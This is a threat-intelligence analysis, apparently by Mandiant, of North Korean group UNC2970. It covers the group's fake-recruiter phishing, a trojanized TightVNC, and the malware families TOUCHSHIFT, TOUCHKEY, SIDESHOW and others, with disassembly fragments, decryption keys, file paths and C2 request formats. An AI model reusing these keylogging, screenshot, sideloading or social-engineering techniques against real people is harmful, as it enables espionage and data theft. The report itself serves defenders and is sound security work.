Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970

Since June 2022, Mandiant has been tracking a campaign targeting Western Media and Technology companies from a suspected North Korean espionage group tracked as UNC2970. In June 2022, Mandiant Managed Defense detected and responded to an UNC2970 phishing campaign targeting a U.S.-based technology company. During this operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT. Mandiant suspects UNC2970 specifically targeted security researchers in this operation. Following the identification of this campaign, Mandiant responded to multiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a job recruitment theme and demonstrated advancements in the groups ability to operate in cloud environments and against Endpoint Detection and Response (EDR) tools.

UNC2970 is suspected with high confidence to be UNC577, also known as Temp.Hermit. UNC577 is a cluster of North Korean cyber activity that has been active since at least 2013. The group has significant malware overlaps with other North Korean operators and is believed to share resources, such as code and complete malware tools with other distinct actors. While observed UNC577 activity primarily targets entities in South Korea, it has also targeted other organizations worldwide.

UNC2970 has historically targeted organizations with spear phishing emails containing a job recruitment theme. These operations have multiple overlaps with public reporting on "Operation Dream Job" by Google TAG, Proofpoint, and ClearSky.

UNC2970 has recently shifted to targeting users directly on LinkedIn using fake accounts posing as recruiters. UNC2970 maintains an array of specially crafted LinkedIn accounts based on legitimate users. These accounts are well designed and professionally curated to mimic the identities of the legitimate users in order to build rapport and increase the likelihood of conversation and interaction. UNC2970 uses these accounts to socially engineer targets into engaging over WhatsApp, where UNC2970 will then deliver a phishing payload either to a target's email, or directly over WhatsApp. UNC2970 largely employs the PLANKWALK backdoor during phishing operations as well as other malware families that share code with multiple tools leveraged by UNC577. Mandiant recently published a blog post detailing UNC2970 activity that was identified by Mandiant Managed Defense during proactive threat hunting. This activity was initially clustered as UNC4034 but has since been merged into UNC2970 based on multiple infrastructure, tooling, and tactics, techniques, and procedures (TTP) overlaps.

When you're done reading this post, don't forget to check out part two on LIGHTSHIFT and LIGHTSHOW.

Summary

In June 2022, Mandiant Managed Defense detected and responded to an UNC2970 phishing campaign targeting a U.S.-based technology company. During this operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT. Mandiant suspects UNC2970 specifically targeted security researchers in this operation. Following the identification of this campaign, Mandiant responded to multiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a job recruitment theme.

Initial Access

When conducting phishing operations, UNC2970 engaged with targets initially over LinkedIn masquerading as recruiters. Once UNC2970 contacts a target, they would attempt to shift the conversation to WhatsApp, where they would continue interacting with their target before sending a phishing payload that masqueraded as a job description. In at least one case, UNC2970 continued interacting with a victim even after the phishing payload was executed and detected, asking for screenshots of the detection.

The phishing payloads primarily utilized by UNC2970 are Microsoft Word documents embedded with macros to perform remote-template injection to pull down and execute a payload from a remote command and control (C2). Mandiant has observed UNC2970 tailoring the fake job descriptions to specific targets.



Figure 1: UNC2970 lure document

The C2 servers utilized by UNC2970 for remote template injection have primarily been compromised WordPress sites, a trend observed in other UNC2970 code families as well as those used by other DPRK groups. At the time of analysis, the remote template was no longer present on the C2, however following this phishing activity, Mandiant identified it beaconing to a C2 associated with PLANKWALK.

In the most recent UNC2970 investigation, Mandiant observed the group returning to WhatsApp to engage their targets. This activity overlaps with a recent blog post by MSTIC on operations from ZINC, as well as the previously mentioned Mandiant blog post from July 2022.

The ZIP file delivered by UNC2970 contained what the victim thought was a skills assessment test for a job application. In reality, the ZIP contained an ISO file, which included a trojanized version of TightVNC that Mandiant tracks as LIDSHIFT. The victim was instructed to run the TightVNC application which, along with the other files, are named appropriately to the company the victim had planned to take the assessment for.

In addition to functioning as a legitimate TightVNC viewer, LIDSHIFT contained multiple hidden features. The first was that upon execution by the user, the malware would send a beacon back to its hardcoded C2; the only interaction this needed from the user was the launching of the program. This lack of interaction differs from what MSTIC observed in their recent blog post. The initial C2 beacon from LIDSHIFT contains the victim's initial username and hostname.

LIDSHIFT's second capability is to reflectively inject an encrypted DLL into memory. The injected DLL is a trojanized Notepad++ plugin that functions as a downloader, which Mandiant tracks as LIDSHOT. LIDSHOT is injected as soon as the victim opens the drop down inside of the TightVNC Viewer application. LIDSHOT has two primary functions: system enumeration and downloading and executing shellcode from the C2.

LIDSHOT sends the following information back to its C2:

- Computer Name
- Product name as recorded in the following registry key SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName
- IP address
- Process List with User and Session ID associate per process

Establish Foothold

In multiple investigations, Mandiant has observed UNC2970 deploy PLANKWALK to establish footholds within environments. PLANKWALK is a backdoor written in C++ that communicates over HTTP and utilizes multiple layers of DLL sideloading to execute an encrypted payload. PLANKWALK is initially executed through a launcher that will import and execute a second stage launcher expected to be on disk.

Observed First Stage Launcher names:

• destextapi.dll

- manextapi.dll
- pathextapi.dll
- preextapi.dll
- Wbemcomn.dll

Once loaded and executed, the secondary launcher will attempt to decrypt and execute an encrypted PLANKWALK sample on disk that matches the following pattern:

C:\ProgramData\Microsoft\Vault\cache<three numerical digits>.db

Once executed, PLANKWALK will decrypt an on-host encrypted configuration file that contains the C2 for the backdoor. The C2 for PLANKWALK has largely been co-opted by legitimate WordPress sites.

Following the deployment of PLANKWALK, Mandiant observed UNC2970 leverage a wide variety of additional tooling, including Microsoft InTune to deploy a shellcode downloader.

Tool Time: Kim "The Toolman" Taylor

During their operations, Mandiant has observed UNC2970 use a wide range of custom, post-exploitation tooling to achieve their goals. One of UNC2970's go-to tools has been a dropper tracked as TOUCHSHIFT. TOUCHSHIFT allows UNC2970 to employ follow-on tooling that range from keyloggers and screenshot utilities, to full featured backdoors.

TOUCHSHIFT

TOUCHSHIFT is a malicious dropper that masquerades as mscoree.dllor netplwix.dll. TOUCHSHIFT is typically created in the same directory and simultaneously as a legitimate copy of a Windows binary. TOUCHSHIFT leverages DLL Search Order Hijacking to use the legitimate file to load and execute itself. TOUCHSHIFT has been observed containing one to two various payloads which it executes in-memory. Payloads that have been seen include TOUCHSHOT, TOUCHKEY, HOOKSHOT, TOUCHMOVE, and SIDESHOW.

To appear legitimate, the file uses over 100 exports that match common system export names. However, the majority all point to the same empty function. The malicious code has been seen located in exports LockClrVersion or UsersRunDllW in different instances.

InitSSAutoEnterThread	0000000180003F00	66
🛃 LoadLibraryShim	0000000180003F00	67
🛃 LoadLibraryWithPolicyShim	0000000180003F00	68
LoadStringRC	0000000180003F00	69
LoadStringRCEx	0000000180003F00	70
LockClrVersion	0000000180003F10	71
🛃 LogHelp_LogAssert	0000000180003F00	72
LogHelp_NoGuiOnAssert	0000000180003F00	73
LogHelp_TerminateOnAssert	0000000180003F00	74
MetaDataGetDispenser	0000000180003F00	75
ND_CopyObjDst	0000000180003F00	76
ND_CopyObjSrc	0000000180003F00	77

Figure 2: Malicious export alongside several of the dummy exports

When TOUCHSHIFT contains a second payload, it takes a single character command line option as its first argument to determine which of the two payloads to execute.

```
cl, cs:byte_180020284 ; ·
cmp
movzx
       edx, byte ptr [rbp+500h+var_390+2]
r8d, byte ptr [rbp+500h+var_390+1]
movzx
        short loc_180004008 ;
jnz
       r8b, cs:byte_180020285 ; p
short loc_180004008 ; -
cmp
inz
       dl, cs:byte_180020286 ; null
cmp
        short loc_180004008 ;
jnz
        r14d, 1
mov
                           -p
        short loc_18000405D
jmp
                        ; CODE XREF: LockClrVersion+DD^j
                        ; LockClrVersion+E6^j ...
cmp
        cl, cs:byte_180020288 ;
jnz
        short loc_180004029
cmp
        r8b, cs:byte_180020289 ; t
        short loc_180004029 ;
jnz
       dl, cs:byte 18002028A ; null
cmp
        short loc_180004029 ;
jnz
        r14d, 2
mov
                        ; -t
jmp
        short loc_18000405D
                        ; CODE XREF: LockClrVersion+FE†j
                         ; LockClrVersion+107^j ...
       eax, cs:byte_18002028C ;
movzx
movzx ecx, cl
sub
        ecx, eax
jnz
        short loc 180004052
       eax, cs:byte_18002028D ; a
movzx
movzx ecx, r8b
sub
        ecx, eax
        short loc_180004052
jnz
movzx
       eax, cs:byte_18002028E ; null
movzx ecx, dl
sub
       ecx, eax
                        ; CODE XREF: LockClrVersion+125^j
                        ; LockClrVersion+134†j
test
       ecx, ecx
        eax, 3
mov
                        ; -a
cmovz r14d, eax
```

Figure 3: Checking command line options

To unpack its payload(s), TOUCHSHIFT generates a decryption key by XOR encoding its second argument and the first 16 characters of the legitimate executable's file name.

For example, in one instance Mandiant observed the arguments -CortanaUIFilter, XOR encoded with the hardcoded key 009WAYHb90687PXkS, and printfilterpipel, which was XOR encoded with the hardcoded key .sV%58&.lypQ[\$= and was loaded by the file printfilterpipelinesvc.exe. In another instance, the argument used was --forkavlauncher and the loading file was C:\windows\Branding\Netplwiz.exe.

Once the code is unpacked, it is then loaded into a memory location created by a call to VirtualAlloc and executed from there.

)180024904	4D	5A	90	00	03	00	00	00	04	00	00	00	FF	FF	00	00	Mzÿÿ
)180024914	B8	00	00	00	00	00	00	00	40	00	00	00	00	00	00	00	@
)180024924	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	00	
)180024934	00	00	00	00	00	00	00	00	00	00	00	00	D8	00	00	00	Ø
)180024944	0E	1F	BA	0E	00	Β4	09	CD	21	B8	01	4C	CD	21	54	68	º′.Í!LÍ!⊤h
)180024954	69	73	20	70	72	6F	67	72	61	6D	20	63	61	6E	6E	6F	is program canno
)180024964	74	20	62	65	20	72	75	6E	20	69	6E	20	44	4F	53	20	t be run in DOS
)180024974		6F							24								
)180024984																	
)180024994																	
)1800249A4	DE	AF	B7	2C													Þ ,AÙ , <u>i</u> ,¶Ù ,
)1800249B4									DE								
)1800249C4	DE	AF	80	2C													Þ ⁻ .,°Ù.,Rich±Ù.,
)1800249D4		_		00					50								PEd
)1800249E4	3B	AE	8D	61	00	00	00	00	00	00	00	00	FO	00	22	20	;⊜.að."
)1800249F4	08	02	0A	00	00	C4	01	00	00	C8	00	00	00	00	00	00	ÄÈ
)180024A04	74	9A	00	00	00	10	00	00	00	00	00	80	01	00	00	00	t
)180024A14	00	10	00	00	00	02	00	00	05	00	02	00	00	00	00	00	
)180024A24			02	00	00	00		00	00	00	03	00	00	04	00	00	
)180024A34	DC	DC	02	00	02	00	40	01	00	00	10	00	00	00	00	00	ÜÜ@
180024A44	00	10	00	00	00	00	00	00	00	00	10	00	00	00	00	00	

Figure 4: Beginning of unpacked payload in memory

Once the payload(s) has/have been executed, the main portion of TOUCHSHIFT will sleep for a period of time allowing the payload(s) to continue executing.

TOUCHSHIFT-ing into Gear — Follow on payloads

TOUCHSHOT

TOUCHSHOT takes screenshots of the system on which it is running and saves them to a file to be retrieved by the threat actor at a later time. TOUCHSHOT is configured to take a screenshot every three seconds, and then uses ZLIB to compress the images. The compressed data is then appended to a file that it creates and continues appending new screenshots to this file until the file reaches five megabytes in size, at which point it will create a new file with the same naming convention. TOUCHSHOT was seen embedded in the same instance of TOUCHSHIFT as TOUCHKEY (discussed later in the post).

TOUCHSHOT will create a file in the C:\Users\{user}\AppData\Roaming\Microsoft\Windows\Themes\ directory, and will name the file ~DM{ ####}P.dat, where the four numbers are pseudo-randomly generated. Once TOUCHSHOT has generated the file name, it attempts to create a handle to the file. If the return value indicates that the file does not exist, it will then create the file. This check is performed as part of a loop that continues until a new file needs to be created. After each iteration of the loop, TOUCHSHOT will then take a screenshot, which is appended to the staging file.



Figure 5: Generation of the directory path

)1800047F0	lea	r8, Src	;	"~DM"
)1800047F7	mov	edx, 104h	;	SizeInWords
)1800047FC	mov	rbx, rax		
)1800047FF	xor	eax, eax		
)180004801	mov	[rbx], rax		
)180004804	mov	[rbx+8], ax		
)180004808	mov	<pre>rcx, [rdi+8]</pre>	;	Dst
)18000480C	call	wcscpy_s		
)180004811	call	cs:GetTickCount		
)180004817	mov	ecx, eax	;	Seed
)180004819	call	srand		
)18000481E	mov	esi, 4		
		v v		
)180004823				
)180004823	loc 1800	004823:		
)180004823	call	rand		
180004879		rcx, [rdi+8]		
18000487D		r8, aP		"P"
180004884			3	SizeInWords
180004889		wcscat_s		
18000488E		<pre>rcx, [rdi+8]</pre>		
180004892		-	-	".DAT"
180004899		edx, 104h	3	SizeInWords
18000489E	call	wcscat_s		

Figure 6: Generation of file name with pseudo-random numbers

000000011500055 000000011500055 000000011500055 000000011500055 000000011500055 000000011500055 000000011500055 000000011500055	23 mov [rsp+78h+hTmeplatefile], r14 ; hTmeplatefile 28 mov rsi, rcx 28 mov (rsp+78h-dwflagsAndAttributes], 80h ; dwflagsAndAttributes 38 mov rcx, [rcx+18h] ; lpFileHame 37 mor rdd, r9d ; lpSecurityAttributes 34 lea rdd, [r141] ; dx6hareNode 50 mov [rsp+78h+dwCreationDisposition], 3 ; dwCreationDisposition 46 mov edx, 40000000h ; dwDesiredAccess 40 call cs:[reatefile] 51 mov rdi, rax 4 cap rax, 0#FFFFFFFFFFFFFFF					
5 2						
	rsi+10h] ; lpFileName r14+1] ; dwShareMode					
	8h+hTemplateFile], r14 ; hTemplateFile					
0180005667 xor r9d, r9						
	8h+dwFlagsAndAttributes], 80h ; dwFlagsAndAttributes 0000000h ; dwDesiredAccess					
	8h+dwCreationDisposition], 1 ; dwCreationDisposition					
	0018000567F call cs:CreateFileW 00180005685 mov rdi.rax					
	FFFFFFFFFFFF					
018000568C jnz short	loc_180005696					
•	**					
<pre>11 cs:GetLastError p short loc_1800056E6</pre>	0000000180005696 0000000180005696 loc_180005696: ; dwMoveMethod					
	000000180005696 mov r9d, 2					
	000000018000569C xor r8d, r8d ; lpDistanceToMoveHigh 000000018000569F xor edx, edx ; lDistanceToMove					
	00000001800056A1 mov rcx, rdi ; hFile					
	00000001800056A4 call cs:SetFilePointer 00000001800056AA lea r9, [rsp+78h+NumberOfBytesWritten] ; lpNumberOfBytesWritten					
	0000001800056AF mov [rsp+78h+NumberOfBytesWritten], r14d					
	0000000180005684 mov r8d, ebp ; nNumberOfBytesToWrite 0000000180005687 mov gword ptr [rsp+78h+dwCreationDisposition], r14 ; lpOverlapped					
	00000001800056BC mov rdx, rbx ; 1pBuffer					
	0000001800056BF mov rcx, rdi ; hFile 0000001800056C2 call cs:WriteFile					
F: 7.0 //						
Figure 7: Creating	g a handle to the file or creating it					
)1800052EF xor	ecx, ecx ; hWnd					
)1800052F1 call						
)1800052F7 mov						
	r13, rax					
)1800052FA mov	[rbp+57h+hDC], rax					
)1800052FE mov	r8d, [r14+1Ch] ; cy					
)180005302 mov	edx, [r14+18h] ; cx					

 >)180005302 mov
 edx, [r14+18h] ; cx

 >)180005306 mov
 rcx, rax
 ; hdc

 >)180005309 call
 cs:CreateCompatibleBitmap

 >)18000530F mov
 rbx, rax

 >)180005312 mov
 [rbp+57h+hbm], rax

 >)180005316 mov
 rcx, r13
 ; hdc

Figure 8: Taking a screenshot

TOUCHKEY

TOUCHKEY is a keylogger that captures keystrokes and clipboard data, both of which are encoded with a single-byte XOR and saved to a file. As with TOUCHSHOT, these files need to be acquired by the threat actor through additional means.

		<u>.</u> _	- 1
🗾 🚄 🔛			
0000001800	01AE0		
00000001800	01AE0 loc 18	80001AE0:	
00000001800	01AE0 movzx	eax, byte ptr [r8+rcx]	
0000001800	01AE5 inc	rcx	
00000001800	01AE8 <mark>xor</mark>	al, 62h	
	01AEA <mark>dec</mark>		
00000001800	01AED mov	[rcx-1], al	
00000001800	01AF0 jnz	short loc_180001AE0	
		▼ ▼	_
		• •	
001AF2			
001AF2 loc 180	001AF2:	; lpString	
001AF2 lea			
001AFA call			
001B00 mov	r9, rsi	; File	
001B03 mov			
001B09 movsxd			
001B0C mov	rcx, rdi	; Str	
001B0F call	fwrite	-	

Figure 9: XOR'ing data with byte 0x62 before writing to the staging file

TOUCHKEY creates two files in the <code>C:\Users\</code>

{user}\AppData\Roaming\Microsoft\Windows\Templates\directory. The file name Normal.dostis used for storing the captured keystrokes, while the file name Normal.docbis used for the clipboard data. The full paths are then passed into their own thread, where the keystrokes or clipboard data will be captured and appended to their respective files.

```
        00000001800030DB xor
        r9d, r9d
        ; fCreate

        00000001800030DE lea
        rdx, [rsp+158h+pszPath]; pszPath

        00000001800030E3 lea
        r8d, [r9+CSIDL_TEMPLATES]; csidl

        0000001800030E7 xor
        ecx, ecx
        ; hwnd

        0000001800030EF cmp
        cs:SHGetSpecialFolderPathA

        0000001800030EF cmp
        eax, 1
```

0000000180003128 lea	r8, [rsp+158h+pszPath]
000000018000312D lea	<pre>rdx, aSNormalDost ; "%s\\Normal.dost"</pre>
0000000180003134 lea	<pre>rcx, VarFullPath_Normal_dost ; Dest</pre>
000000018000313B call	sprintf
0000000180003140 lea	r8, [rsp+158h+pszPath]
0000000180003145 lea	<pre>rdx, aSNormalDocb ; "%s\\Normal.docb"</pre>
000000018000314C lea	<pre>rcx, Var_FullPath_Normal_docb ; Dest</pre>
0000000180003153 call	sprintf
0000000180003158 xor	ebx, ebx
000000018000315A lea	r8, StartAddress ; StartAddress
0000000180003161 xor	r9d, r9d ; ArgList
0000000180003164 xor	edx, edx ; StackSize
0000000180003166 xor	ecx, ecx ; Security
0000000180003168 mov	<pre>[rsp+158h+ThrdAddr], rbx ; ThrdAddr</pre>
000000018000316D mov	<pre>[rsp+158h+InitFlag], ebx ; InitFlag</pre>
0000000180003171 call	_beginthreadex
0000000180003176 lea	r8, sub_180001900 ; StartAddress
000000018000317D xor	r9d, r9d ; ArgList
0000000180003180 xor	edx, edx ; StackSize
0000000180003182 xor	ecx, ecx ; Security
0000000180003184 mov	<pre>[rsp+158h+ThrdAddr], rbx ; ThrdAddr</pre>
0000000180003189 mov	<pre>[rsp+158h+InitFlag], ebx ; InitFlag</pre>
000000018000318D call	beginthreadex

Figure 11: Adding file names to the full path and creating the threads

In one of the created threads, TOUCHKEY will open the clipboard and grab the data that is stored within it. In the other thread, TOUCHKEY will set a hook into the keyboard, and record any keys that are pressed.

180001944 xor 180001946 call 18000194C test 18000194E jz	ecx, ecx ; hWndNewOwner cs:OpenClipboard eax, eax short loc_180001930	
	000000180001950 mov 0000000180001955 call 0000000180001955 call 0000000180001955 test 0000000180001951 jnz	ecx, 1 ; uFormat cs:GetClipboardData rsi, rax rax, rax short loc_180001968

Figure 12: Capturing the clipboard data

000000018000302E xor	r9d, r9d ; dwThreadId				
0000000180003031 lea	rdx, fn ; lpfn				
0000000180003038 lea	ecx, [r9+WH_KEYBOARD_LL] ; idHook				
000000018000303C mov	r8, rax ; hmod				
000000018000303F call	cs:SetWindowsHookExA				
0000000180003045 mov	rbx. rax				
Figure 13: Capturing keystrokes					

HOOKSHOT

HOOKSHOT is a tunneler that leverages a statically linked implementation of OpenSSL to communicate back to its C2. While it connects over TCP, it does not make use of a client certificate for encryption.

```
      11800971D0
      aCryptoDsaDsaAs
      db '.\crypto\dsa\dsa_asn1.c',0

      11800971D0
      ; DATA XREF: sub_180011AF0+1Ato

      11800971E8
      aShaPartofOpens
      db 'SHA part of OpenSSL 0.9.8k 25 Mar 2009',0

      1180097216
      align 10h
      is0097216

      1180097217
      align 8
      ; DATA XREF: sub_180013690+9710

      1180097218
      aCryptoErrErrC
      db '.\crypto\err\err.c',0

      1180097218
      align 10h
      ; sub_180013510+2310

      1180097218
      align 10h
      ; sub_180013510+8710

      1180097218
      align 20h
      ; bATA XREF: sub_180013510+2310

      1180097220
      aStackPartOfOpe db 'Stack part of OpenSSL 0.9.8k 25 Mar 2009',0
      align 20h

      1180097250
      aCryptoStackSta db '.\crypto\stack\stack.c',0
      is00913880+3610...

      1180097277
      align 8
      ; sub_180013880+3610...

      1180097277
      align 8
      is009728

      1180097278
      aCryptoLhashLha db '.\crypto\lhash\lhash.c',0
      sub_180013880+3610...

      1180097278
      align 8
      is009728
      align 8

      1180097278
      align 8
      is009728
      align 8

      1180097278
      align 8
      is009728
      align 8

      118009728
      align 8<
```

HOOKSHOT takes an encoded argument containing two IP and port pairs, which it will leverage for communicating with its C2.

```
rdx, [rsp+0EC0h+pNumArgs] ; pNumArgs
rcx, [rbp+0DC0h+WideCharStr] ; lpCmdLine
180001A95 lea
180001A9A lea
 180001AA1 call
                       cs:C
                               andLineToArgvW
180001AA7 mov
                      rdi, rax
 180001AAA call
                      cs:Ge
                      r8, [rdi] ; lpWideCharStr
[rsp+0EC0h+lpUsedDefaultChar], rsi ; lpUsedDefaultChar
180001AB0 mov
180001AB3 mov
                                         ; CodePage
180001AB8 mov
                      ecx, eax
                      rax, [rbp+0DC0h+Src]
[rsp+0EC0h+lpDefaultChar], rsi ; lpDefaultChar
180001ABA lea
180001AC1 mov
 180001AC6 or
                      r9d, ØFFFFFFFh ; cchWideChar
180001ACA xor
                      edx, edx
                                         ; dwFlags
                      [rsp+0EC0h+cbMultiByte], 40h ; cbMultiByte
[rsp+0EC0h+lpMultiByteStr], rax ; lpMultiByteStr
180001ACC mov
 180001AD4 mov
180001AD9 call
                      cs:WideCharToMultiB
180001ADF call
                      cs:Get
 180001AE5 mov
                       r8, [rdi+8]
                                         ; lpWideCharStr
180001AE9 mov
                      [rsp+0EC0h+lpUsedDefaultChar], rsi ; lpUsedDefaultChar
180001AEE mov
                      ecx, eax
                                         ; CodePage
                      rax, [rbp+0DC0h+Str]
[rsp+0EC0h+lpDefaultChar], rsi ; lpDefaultChar
180001AF0 lea
180001AF7 mov
 180001AFC or
                      r9d, ØFFFFFFFh ; cchWideChar
                      edx, edx ; dwFlags
[rsp+0EC0h+cbMultiByte], 8 ; cbMultiByte
180001B00 xor
180001B02 mov
 180001B0A mov
                       [rsp+0EC0h+lpMultiByteStr], rax ; lpMultiByteStr
180001B0F call
                      cs:WideCharToMultiByte
180001B15 call
                      cs:Get
                      r8, [rdi+10h] ; lpWideCharStr
[rsp+0EC0h+lpUsedDefaultChar], rsi ; lpUsedDefaultChar
 180001B1B mov
180001B1F mov
                      ecx, eax
                                         ; CodePage
180001B24 mov
                       rax, [rbp+0DC0h+var_C70]
180001B26 lea
                      [rsp+0EC0h+lpDefaultChar], rsi ; lpDefaultChar
180001B2D mov
 180001B32 or
                      r9d, ØFFFFFFFh ; cchWideChar
180001B36 xor
                       edx, edx
                                         ; dwFlags
                      eax, eax ; umrags
[rsp+0EC0h+cbMultiByte], 40h ; cbMultiByte
[rsp+0EC0h+lpMultiByteStr], rax ; lpMultiByteStr
180001B38 mov
 180001B40 mov
180001B45 call
                      cs:WideCharToMultiBvte
180001B4B call
                      cs:G
                      r8, [rdi+18h] ; lpWideCharStr
[rsp+0EC0h+lpUsedDefaultChar], rsi ; lpUsedDefaultChar
180001851 mov
180001B55 mov
18000185A mov
                      ecx, eax
                                         ; CodePage
                      ecx, eax ; coderage
rax, [rbp+0DC0h+var_CC0]
[rsp+0EC0h+lpDefaultChar], rsi ; lpDefaultChar
180001B5C lea
180001B63 mov
 180001B68 or
                      r9d, ØFFFFFFFh ; cchWideChar
                      edx, edx ; dwFlags
[rsp+0EC0h+cbMultiByte], 8 ; cbMultiByte
180001B6C xor
180001B6E mov
                      [rsp+0EC0h+lpMultiByteStr], rax ; lpMultiByteStr
 180001B76 mov
180001B7B call
                      cs:WideCharToMultiBvte
Figure 15: Separating IP's and ports
```

HOOKSHOT will then create a socket using these two IP addresses, and tunnel traffic across them utilizing TLSv1.0.

)180001C7B mov	rdi, cs:qword_1	.800D7A50			
180001C82 mov	edx, 1	; type			
)180001C87 movdqa	[rsp+0EC0h+var_	E80], xmm6			
)180001C8D lea	r8d, [rdx+5]	; protocol			
)180001C91 mov	ecx, r12d	; af			
180001C94 call	cs:socket	; IPv4 TCP			
Figure 16: Socket creation					

TOUCHMOVE

TOUCHMOVE is a loader that decrypts a configuration file and a payload, both of which must be on disk, and then executes the payload. TOUCHMOVE generates an RC6 key to decrypt the two files by querying the system's BIOS date, version, manufacturer, and product name. Once decrypted, the results are XOR encoded with a hardcoded key. If the generated RC6 key is incorrect, the configuration and payload files will not successfully decrypt, indicating that UNC2970 compiles instances of TOUCHMOVE after having already conducted reconnaissance on the target victim system. Once the RC6 key is successfully generated, a handle is created to the configuration file, and the decryption process is conducted. If the configuration file is successfully decrypted, the payload's full path is located within it, and the same decryption process then occurs on the payload. Following this, the payload is executed.

180011E20 xmmword 180011E20 xmmword	
180011E20 XIIIIWOTU_180011E20 XIIIIWOTU	
	; DATA XREF: sub_1800035B0+1251r
180011E20	; HARDWARE\DESCRIP
1180011E30 xmmword_180011E30 xmmword	
180011E30	; DATA XREF: sub_1800035B0+1A91r
)180011E30	; SystemBiosVersio
1180011E40 xmmword_180011E40 xmmword	
180011E40	; DATA XREF: sub_1800035B0+219↑r
180011E40	; TION\System\BIOS
180011E50 xmmword_180011E50 xmmword	'rutcafunaMmetsyS'
180011E50	; DATA XREF: sub_1800035B0+2441r
180011E50	; SystemManufactur
180011E60 xmmword 180011E60 xmmword	'maNtcudorPmetsyS'
180011E60	; DATA XREF: sub_1800035B0+2781r
180011E60	; SystemProductNam
180011E70 xmmword 180011E70 xmmword	'tluM\metsyS\NOIT'
180011E70	; DATA XREF: sub 1800035B0+2E81r
180011E70	; TION\System\Mult
180011E80 xmmword 180011E80 xmmword	
180011E80	; DATA XREF: sub 1800035B0+2F81r
180011E80	; ifunctionAdapter
1180011E90 xmmword 180011E90 xmmword	
180011E90	; DATA XREF: sub_180003580+3081r
180011E90	: \0\DiskControlle
1180011EA0 xmmword 180011EA0 xmmword	
1180011EA0 XIIIIWOFU_180011EA0 XIIIIWOFU	
180011EA0	<pre>; DATA XREF: sub_1800035B0+318⁺ : r\0\DiskPeripher</pre>
1000IIEN0	; r\o\DiskPeripher

Figure 17: Bios query strings

```
180003C00 mov [rsp+52D0h+var_52A0], rsi
180003C05 mov dword ptr [rsp+52D0h+var_52A8], 80h
180003C05 mov dword ptr [rsp+52D0h+var_52B0], 3 ; Open Existing
180003C15 xor r9d, r9d
180003SC18 mov edx, 8000000h
180003SC18 mov edx, 80000000h
180003C20 lea rcx, [rbp+51D0h+var_440] ; "C:\\windows\\System32\\wlansvc.cpl"
180003SC2 rall cs:qword_180017880 ; CreateFile
```

Figure 18: Creating a handle to the configuration file

```
bil80003024 mov [rsp+52D0h+var_52A0], rsi
bil80003029 mov dword ptr [rsp+52D0h+var_52A8], 80h
bil80003031 mov dword ptr [rsp+52D0h+var_5280], 3 ; Open Existing
bil80003032 mov r9d, r9d
bil8000303C mov r8d, r14d
bil8000303F mov edx, 8000000h
bil80003044 lea rcx, [rbp+51D0h+var_4784] ; "C:windows\system32\grpedit.dat"
bil80003048 call cs:qword_180017880 ; CreateFile
```

Figure 19: Creating a handle to the payload

SIDESHOW

SIDESHOW is a backdoor written in C/C++ that communicates via HTTP POST requests with its C2 server. The backdoor is multi-threaded, uses RC6 encryption, and supports at least 49 commands, which can be seen in Table 1. Capabilities include arbitrary command execution (WMI capable); payload execution via process injection; service, registry, scheduled task, and firewall manipulation; querying and updating Domain Controller settings; creating password protected ZIP files; and more. SIDESHOW does not explicitly establish persistence; however, based on the multitude of supported commands it may be commanded to establish persistence.

SIDESHOW derives a system-specific RC6 key using the same registry values as TOUCHMOVE and uses the generated key to decrypt the same configuration file from disk that TOUCHMOVE decrypted. The decrypted configuration file contains a list of C2 URLs to which SIDESHOW communicates using HTTP POST requests. SIDESHOW iterates this C2 URL list and attempts to authenticate to each C2 URL until it is successful. Once successful, SIDESHOW enters a state of command processing and sends additional HTTP POST requests to retrieve commands. SIDESHOW attempts to use the system's default HTTP User-Agent string during C2 communications; however, if not available it uses the hard-coded HTTP User-Agent string:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69

When communicating to its C2 server via HTTP POST requests, SIDESHOW forms a URI parameter string consisting of a mix of randomly selected and hard-coded URI parameters.

Authentication requests use the following URI parameter string format:

1<param 1>=<hex seed>&<param 2>=pAJ9dk40Vq85jxKWoNfw1AG2C&<param 3>=<16 random hex chars>

The first URI parameter value comes from SIDESHOW's configuration and is used to seed the random function.

The second URI parameter value, pAJ9dk40Vq85jxKWoNfw1AG2C, is hardcoded and likely an authentication credential.

The third URI parameter value, <16_random_hex_chars>, is a session identifier (<session_id>) used for future communications and consists of two subcomponents:

1.<8 random hex based on seed>

2.<8_random_hex_based_on_tickcount>

The first URI parameter's value, <hex_seed>, is used as a random seed value to derive the first eight hexadecimal characters (<8_random_hex_based_on_seed>), whereas the last eight hexadecimal characters (<8_random_hex_based_on_tickcount>) are derived using the CPU's current tick count as the random seed value. This results in the value <8_random_hex_based_on_seed> being deterministic, while <8_random_hex_based_on_tickcount> is pseudo-random.

The following is an example authentication URI parameter string:

1pguid=A59&ssln=pAJ9dk40Vq85jxKWoNfw1AG2C&cup2key=184B280E341AE63F

mov	[rsp+4F0h+var_4B0], rdi
lea	<pre>rax, [rsp+4F0h+var_488]</pre>
mov	[rsp+4F0h+var_4B8], rax
lea	r9, [rbp+3F0h+var_468]
lea	<pre>rax, [rbp+3F0h+Dst]</pre>
mov	edx, 201h ; SizeInBytes
mov	[rsp+4F0h+var_4C0], rax
lea	r8, aSSSSSS ; "%s%s&%s%s&%s%s"
lea	<pre>rax, [rsp+4F0h+var_478]</pre>
mov	[rsp+4F0h+var_4C8], rax
lea	<pre>rcx, [rbp+3F0h+DstBuf] ; DstBuf</pre>
lea	<pre>rax, [rbp+3F0h+var_340]</pre>
mov	[rsp+4F0h+var_4D0], rax
call	sprintf_s

Figure 20: Building of URI parameter string

SIDESHOW parses the response and considers it a successful authentication if it contains the string < ! DOCTYPE html>.

Command requests use the following URI parameter string format (notice that the <param_2> and <param_3> have switched locations in the string).

1<param_1>=<5_random_digits>&<param_3>=2<session_id>&<param_2>=<6_random_digits>

Example command URI parameter string:

lother=37685&session=2184B280E341AE63F&page=593881

